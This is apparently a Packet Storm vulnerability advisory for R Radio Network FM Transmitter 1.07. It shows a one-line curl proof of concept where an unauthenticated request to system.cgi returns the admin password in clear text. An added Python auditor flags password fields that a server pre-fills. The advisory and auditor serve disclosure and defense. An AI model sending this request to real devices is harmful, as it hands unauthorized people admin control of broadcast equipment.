
R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

R Radio Network FM Transmitter version 1.07 suffers from improper access control: an unauthenticated actor can directly reference the system.cgi endpoint and disclose the clear-text password of the admin user, allowing authentication bypass and access to the FM station setup.

Packet Storm
R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07

Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.

Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.

Tested on: CSBtechDevice

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php

09.10.2023

--

$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$
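
The response above discloses the password because the server pre-populates the value attribute of a password input. The following check is an added example, not part of the advisory or the vendor's code: it audits saved HTML from a device's management pages for password fields that arrive with a value set. The sample pages and the names audit_page and PasswordFieldAuditor are constructed for illustration.

```python
from html.parser import HTMLParser


class PasswordFieldAuditor(HTMLParser):
    """Collects <input type=password> elements that arrive with a value set."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        # Attribute names are lowercased by the parser; unquoted values work too.
        attr = {name: (value or "") for name, value in attrs}
        if attr.get("type", "").strip().lower() != "password":
            return
        secret = attr.get("value", "")
        if secret:
            # Record only metadata; never copy the secret into a report.
            self.findings.append({
                "field": attr.get("name", ""),
                "value_length": len(secret),
                "line": self.getpos()[0],
            })


def audit_page(html_text):
    """Return findings for password inputs pre-populated by the server."""
    auditor = PasswordFieldAuditor()
    auditor.feed(html_text)
    auditor.close()
    return auditor.findings


# Constructed sample modelled on the response quoted in the advisory.
DISCLOSING_PAGE = """<html><head><title>System Settings</title></head><body>
<table><tr><td>Password for user 'admin'</td>
<td><input type=password name=pw size=10 maxlength=10 value="testingus"></td></tr>
</table></body></html>"""

# Constructed sample of the corrected behaviour: the field is served empty.
FIXED_PAGE = DISCLOSING_PAGE.replace('value="testingus"', 'value=""')

if __name__ == "__main__":
    for label, page in (("disclosing", DISCLOSING_PAGE), ("fixed", FIXED_PAGE)):
        print(label, audit_page(page))
```

An empty result only shows that the page no longer echoes the stored password; the endpoint still needs to require authentication before it is served.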
